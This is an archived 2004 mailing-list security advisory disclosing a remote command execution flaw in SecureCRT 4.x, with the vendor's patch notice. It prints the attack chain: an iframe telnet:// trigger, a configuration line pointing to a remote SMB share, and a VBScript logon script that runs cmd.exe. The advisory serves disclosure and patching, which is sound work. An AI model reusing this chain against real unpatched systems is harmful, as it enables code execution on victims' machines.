Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security NTBugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

SecureCRT - Remote Command Execution

from [Brett Moore] Network Security [Permanent Link]
Subject: SecureCRT - Remote Command Execution
Date: Tue, 23 Nov 2004 13:33:54 +1300 
========================================================================
= SecureCRT - Remote Command Execution
=
= Vendor Update:
= http://www.vandyke.com/download/securecrt/index.html
=
= Affected Software:
=       SecureCRT V4.1, V4.0 (and probably lower)
=
= Public disclosure on November 23, 2004
========================================================================

== Overview ==

In this time of responsible vulnerability disclosure, it's a little
disturbing when a vendor acts on disclosed information but gives no
recognition or even notification that an update has been created due to
the information passed to them.

This advisory is a little late, the update was posted to the vendor
website last month. The only reason I know this, is because I asked and
received a response.
------------------------------------------------------------------------

Brett,

SecureCRT version 4.1.9 was released on Oct. 26, and is
available for public download at the following location:

    http://www.vandyke.com/download/securecrt/index.html

My apologies for not sending a special notice to you upon
release. It was something that slipped off my radar.

If you have any questions, please let us know.

Thanks,
Jake Devenport

------------------------------------------------------------------------

But enough of that, we know the game and still choose to play.

SecureCRT installs a URL PROTOCOL handler into the registry, as
"C:\Program Files\SecureCRT\SecureCRT.EXE" %1

This allows a user to click on a telnet:// link and have it opened from
within their web browser.

This 'telnet execution' can be automated through an html page such as
<iframe src="telnet://192.168.0.1:25";>

SecureCRT will accept a command line option (/F) to specify the directory
to use as the configuration folder. It is possible by crafting a special
URL to specify this directory through the html page. An attacker can
specify a directory accessible through unprotected SMB share, therefore
allowing them to control the configuration of secureCRT.

SecureCRT allows for 'scripting' using script languages such as vbscript
and has the ability to create a logon script. An attacker can therefore
create a script to execute commands and have these commands executed on
the targets computer.

== Exploitation ==

There appears to be some filtering around the use of \ in the url->command
line parsing, that appeared to prevent the specification of an SMB share
to use for the configuration. This can be easily bypassed and leads to the
loading of a configuration file from a remote site.

The configuration file contains an entry that specifies the login script
to run which can be set a file on the the remote share;

S:"Script Filename"=\\ipofshare\share\folder\scriptname

And the login script can then contain scripting such as;

# $language = "VBScript"
# $interface = "1.0"

Sub Main
  dim wshShell, boolErr, strErrDesc
  Set wshShell = CreateObject("WScript.Shell")
  run = wshShell.Run ("cmd.exe /c dir >c:\shell.txt",0,True)
End Sub

== Solutions ==

- Install the vendor supplied patch.

== Credit ==

Discovered and advised to vandyke.com August 24, 2004 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.

######################################################################
CONFIDENTIALITY NOTICE:

This message and any attachment(s) are confidential and proprietary.
They may also be privileged or otherwise protected from disclosure. If
you are not the intended recipient, advise the sender and delete this
message and any attachment from your system. If you are not the
intended recipient, you are not authorised to use or copy this message
or attachment or disclose the contents to any other person. Views
expressed are not necessarily endorsed by Security-Assessment.com
Limited. Please note that this communication does not designate an
information system for the purposes of the New Zealand Electronic
Transactions Act 2003.
######################################################################

--
Editor's Note: The 43rd Most Powerful Person in Networking says...

Register today to take the TruSecure ICSA exam by 12/31/04  at
<http://www.2test.com> ,  use promo code "CT1204" and you will pay just
$221.25 US Dollars for domestic exam delivery and  $296.25 US Dollars
for international delivery.

Visit <https://ticsa.trusecure.com>  for complete details regarding the
TICSA credential and to take the free sample exam.

--
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • SecureCRT - Remote Command Execution, Brett Moore <=
Previous by Date:  Winamp - Buffer Overflow In IN_CDDA.dll, Brett Moore
Next by Date:  Winamp - Buffer Overflow In IN_CDDA.dll [Unpatched], Brett Moore
Previous by Thread:  Winamp - Buffer Overflow In IN_CDDA.dll, Brett Moore
Next by Thread:  Winamp - Buffer Overflow In IN_CDDA.dll [Unpatched], Brett Moore
Indexes:  [Date] [Thread] [Top] [All Lists]